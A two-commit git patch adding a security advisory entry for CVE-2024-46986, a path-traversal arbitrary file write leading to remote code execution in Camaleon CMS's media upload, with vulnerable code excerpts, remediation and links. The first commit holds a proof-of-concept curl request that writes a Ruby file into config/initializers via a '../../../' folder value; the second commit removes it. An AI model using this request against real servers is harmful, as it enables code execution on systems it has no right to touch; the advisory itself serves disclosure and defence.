From a80f9b54474812521299feb5ec0231d5e66e6caf Mon Sep 17 00:00:00 2001 From: Al Snow Date: Wed, 9 Oct 2024 10:00:23 -0400 Subject: [PATCH 1/2] GHSA SYNC: 1 brand new advisory --- gems/camaleon_cms/CVE-2024-46986.yml | 130 +++++++++++++++++++++++++++ 1 file changed, 130 insertions(+) create mode 100644 gems/camaleon_cms/CVE-2024-46986.yml diff --git a/gems/camaleon_cms/CVE-2024-46986.yml b/gems/camaleon_cms/CVE-2024-46986.yml new file mode 100644 index 0000000000..fbc916a16f --- /dev/null +++ b/gems/camaleon_cms/CVE-2024-46986.yml @@ -0,0 +1,130 @@ +--- +gem: camaleon_cms +cve: 2024-46986 +ghsa: wmjg-vqhv-q5p5 +url: https://github.com/owen2345/camaleon-cms/security/advisories/GHSA-wmjg-vqhv-q5p5 +title: Camaleon CMS affected by arbitrary file write to RCE (GHSL-2024-182) +date: 2024-09-18 +description: | + An arbitrary file write vulnerability accessible via the upload method + of the MediaController allows authenticated users to write arbitrary + files to any location on the web server Camaleon CMS is running on + (depending on the permissions of the underlying filesystem). + E.g. This can lead to a delayed remote code execution in case an + attacker is able to write a Ruby file into the config/initializers/ + subfolder of the Ruby on Rails application. + + Once a user upload is started via the + [upload](https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/controllers/camaleon_cms/admin/media_controller.rb#L86-L87) + method, the file_upload and the folder parameter + + ```ruby + def upload(settings = {}) + params[:dimension] = nil if params[:skip_auto_crop].present? + f = { error: 'File not found.' } + if params[:file_upload].present? + f = upload_file(params[:file_upload], + { folder: params[:folder], dimension: params['dimension'], formats: params[:formats], versions: params[:versions], + thumb_size: params[:thumb_size] }.merge(settings)) + end + [..] + end + ``` + + are passed to the + [upload_file](https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/helpers/camaleon_cms/uploader_helper.rb#L23-L24) + method. Inside that method the given settings are + [merged](https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/helpers/camaleon_cms/uploader_helper.rb#L41-L42) + with some presets. The file format is + [checked against](https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/helpers/camaleon_cms/uploader_helper.rb#L61-L62) + the formats settings we can override with the formats parameters. + + ```ruby + # formats validations + return { error: "#{ct('file_format_error')} (#{settings[:formats]})" } unless cama_uploader.class.validate_file_format( + uploaded_io.path, settings[:formats] + ) + ``` + + Our given folder is then + [passed unchecked](https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/helpers/camaleon_cms/uploader_helper.rb#L73-L74) + to the Cama_uploader: + + ```ruby + key = File.join(settings[:folder], settings[:filename]).to_s.cama_fix_slash + res = cama_uploader.add_file(settings[:uploaded_io], key, { same_name: settings[:same_name] }) + ``` + + In the [add_file](https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/uploaders/camaleon_cms_local_uploader.rb#L77) + method of CamaleonCmsLocalUploader this key argument containing the + unchecked path is then used to write the file to the file system: + + ```ruby + def add_file(uploaded_io_or_file_path, key, args = {}) + [..] + upload_io = uploaded_io_or_file_path.is_a?(String) ? File.open(uploaded_io_or_file_path) : uploaded_io_or_file_path + File.open(File.join(@root_folder, key), 'wb') { |file| file.write(upload_io.read) } + [..] + end + ``` + + ## Proof of concept + + Precondition: A valid account of a registered user is required. (The + values for auth_token and _cms_session need to be replaced with + authenticated values in the curl command below) + + curl --path-as-is -i -s -k -X $'POST' \ + -H $'User-Agent: Mozilla/5.0' -H $'Content-Type: multipart/form-data; boundary=----WebKitFormBoundary80dMC9jX3srWAsga' -H $'Accept: */*' -H $'Connection: keep-alive' \ + -b $'auth_token=[..]; _cms_session=[..]' \ + --data-binary $'------WebKitFormBoundary80dMC9jX3srWAsga\x0d\x0aContent-Disposition: form-data; name=\"file_upload\"; filename=\"test.rb\"\x0d\x0aContent-Type: text/x-ruby-script\x0d\x0a\x0d\x0aputs \"=================================\"\x0aputs \"=================================\"\x0aputs \"= COMPROMISED =\"\x0aputs \"=================================\"\x0aputs \"=================================\"\x0d\x0a------WebKitFormBoundary80dMC9jX3srWAsga\x0d\x0aContent-Disposition: form-data; name=\"folder\"\x0d\x0a\x0d\x0a../../../config/initializers/\x0d\x0a------WebKitFormBoundary80dMC9jX3srWAsga\x0d\x0aContent-Disposition: form-data; name=\"skip_auto_crop\"\x0d\x0a\x0d\x0atrue\x0d\x0a------WebKitFormBoundary80dMC9jX3srWAsga--\x0d\x0a' \ + $'https:///admin/media/upload?actions=false' + + Note that the upload form field formats was removed so that Camaleon + CMS accepts any file. The folder was set to + ../../../config/initializers/so that following Ruby script is written + into the initializers folder of the Rails web app: + + puts "=================================" + puts "=================================" + puts "= COMPROMISED =" + puts "=================================" + puts "=================================" + Once Camaleon CMS is restarted following output will be visible in the log: + + ================================= + ================================= + = COMPROMISED = + ================================= + ================================= + + ## Impact + + This issue may lead up to Remote Code Execution (RCE) via arbitrary + file write. + + ## Remediation + + Normalize file paths constructed from untrusted user input before using + them and check that the resulting path is inside the targeted directory. + Additionally, do not allow character sequences such as .. in untrusted + input that is used to build paths. + + ## See also: + + [CodeQL: Uncontrolled data used in path expression](https://codeql.github.com/codeql-query-help/ruby/rb-path-injection/) + [OWASP: Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal) +cvss_v3: 9.9 +unaffected_versions: + - "< 2.8.0" +patched_versions: + - ">= 2.8.1" +related: + url: + - https://nvd.nist.gov/vuln/detail/CVE-2024-46986 + - https://github.com/owen2345/camaleon-cms/security/advisories/GHSA-wmjg-vqhv-q5p5 + - https://github.com/owen2345/camaleon-cms/commit/b3b12b1e4a9e3fccaf5bb4330820fa7f8744e6bd + - https://codeql.github.com/codeql-query-help/ruby/rb-path-injection + - https://owasp.org/www-community/attacks/Path_Traversal + - https://www.reddit.com/r/rails/comments/1exwtdm/camaleon_cms_281_has_been_released + - https://github.com/advisories/GHSA-wmjg-vqhv-q5p5 From 408819f74d6a753e37cb5295bc5f26c477a4d619 Mon Sep 17 00:00:00 2001 From: Postmodern Date: Wed, 9 Oct 2024 10:54:14 -0700 Subject: [PATCH 2/2] Reformatted the `description:` markdown text --- gems/camaleon_cms/CVE-2024-46986.yml | 71 +++++++++------------------- 1 file changed, 22 insertions(+), 49 deletions(-) diff --git a/gems/camaleon_cms/CVE-2024-46986.yml b/gems/camaleon_cms/CVE-2024-46986.yml index fbc916a16f..f4f91d0635 100644 --- a/gems/camaleon_cms/CVE-2024-46986.yml +++ b/gems/camaleon_cms/CVE-2024-46986.yml @@ -7,16 +7,17 @@ title: Camaleon CMS affected by arbitrary file write to RCE (GHSL-2024-182) date: 2024-09-18 description: | An arbitrary file write vulnerability accessible via the upload method - of the MediaController allows authenticated users to write arbitrary + of the `MediaController` allows authenticated users to write arbitrary files to any location on the web server Camaleon CMS is running on (depending on the permissions of the underlying filesystem). E.g. This can lead to a delayed remote code execution in case an - attacker is able to write a Ruby file into the config/initializers/ + attacker is able to write a Ruby file into the `config/initializers/` subfolder of the Ruby on Rails application. - Once a user upload is started via the - [upload](https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/controllers/camaleon_cms/admin/media_controller.rb#L86-L87) - method, the file_upload and the folder parameter + Once a user upload is started via the [upload] method, the + `file_upload` and the folder parameter. + + [upload]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/controllers/camaleon_cms/admin/media_controller.rb#L86-L87 ```ruby def upload(settings = {}) @@ -31,13 +32,14 @@ description: | end ``` - are passed to the - [upload_file](https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/helpers/camaleon_cms/uploader_helper.rb#L23-L24) - method. Inside that method the given settings are - [merged](https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/helpers/camaleon_cms/uploader_helper.rb#L41-L42) - with some presets. The file format is - [checked against](https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/helpers/camaleon_cms/uploader_helper.rb#L61-L62) - the formats settings we can override with the formats parameters. + are passed to the [upload_file] method. Inside that method the + given settings are [merged] with some presets. The file format + is [checked against] the formats settings we can override with + the formats parameters. + + [upload_file]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/helpers/camaleon_cms/uploader_helper.rb#L23-L24 + [merged]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/helpers/camaleon_cms/uploader_helper.rb#L41-L42 + [checked against]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/helpers/camaleon_cms/uploader_helper.rb#L61-L62 ```ruby # formats validations @@ -46,19 +48,20 @@ description: | ) ``` - Our given folder is then - [passed unchecked](https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/helpers/camaleon_cms/uploader_helper.rb#L73-L74) - to the Cama_uploader: + Our given folder is then [passed unchecked] to the `Cama_uploader`: + + [passed unchecked]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/helpers/camaleon_cms/uploader_helper.rb#L73-L74 ```ruby key = File.join(settings[:folder], settings[:filename]).to_s.cama_fix_slash res = cama_uploader.add_file(settings[:uploaded_io], key, { same_name: settings[:same_name] }) ``` - In the [add_file](https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/uploaders/camaleon_cms_local_uploader.rb#L77) - method of CamaleonCmsLocalUploader this key argument containing the + In the [add_file] method of `CamaleonCmsLocalUploader` this key argument containing the unchecked path is then used to write the file to the file system: + [add_file]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/uploaders/camaleon_cms_local_uploader.rb#L77 + ```ruby def add_file(uploaded_io_or_file_path, key, args = {}) [..] @@ -68,36 +71,6 @@ description: | end ``` - ## Proof of concept - - Precondition: A valid account of a registered user is required. (The - values for auth_token and _cms_session need to be replaced with - authenticated values in the curl command below) - - curl --path-as-is -i -s -k -X $'POST' \ - -H $'User-Agent: Mozilla/5.0' -H $'Content-Type: multipart/form-data; boundary=----WebKitFormBoundary80dMC9jX3srWAsga' -H $'Accept: */*' -H $'Connection: keep-alive' \ - -b $'auth_token=[..]; _cms_session=[..]' \ - --data-binary $'------WebKitFormBoundary80dMC9jX3srWAsga\x0d\x0aContent-Disposition: form-data; name=\"file_upload\"; filename=\"test.rb\"\x0d\x0aContent-Type: text/x-ruby-script\x0d\x0a\x0d\x0aputs \"=================================\"\x0aputs \"=================================\"\x0aputs \"= COMPROMISED =\"\x0aputs \"=================================\"\x0aputs \"=================================\"\x0d\x0a------WebKitFormBoundary80dMC9jX3srWAsga\x0d\x0aContent-Disposition: form-data; name=\"folder\"\x0d\x0a\x0d\x0a../../../config/initializers/\x0d\x0a------WebKitFormBoundary80dMC9jX3srWAsga\x0d\x0aContent-Disposition: form-data; name=\"skip_auto_crop\"\x0d\x0a\x0d\x0atrue\x0d\x0a------WebKitFormBoundary80dMC9jX3srWAsga--\x0d\x0a' \ - $'https:///admin/media/upload?actions=false' - - Note that the upload form field formats was removed so that Camaleon - CMS accepts any file. The folder was set to - ../../../config/initializers/so that following Ruby script is written - into the initializers folder of the Rails web app: - - puts "=================================" - puts "=================================" - puts "= COMPROMISED =" - puts "=================================" - puts "=================================" - Once Camaleon CMS is restarted following output will be visible in the log: - - ================================= - ================================= - = COMPROMISED = - ================================= - ================================= - ## Impact This issue may lead up to Remote Code Execution (RCE) via arbitrary @@ -107,10 +80,10 @@ description: | Normalize file paths constructed from untrusted user input before using them and check that the resulting path is inside the targeted directory. - Additionally, do not allow character sequences such as .. in untrusted + Additionally, do not allow character sequences such as `..` in untrusted input that is used to build paths. - ## See also: + ## See Also [CodeQL: Uncontrolled data used in path expression](https://codeql.github.com/codeql-query-help/ruby/rb-path-injection/) [OWASP: Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal)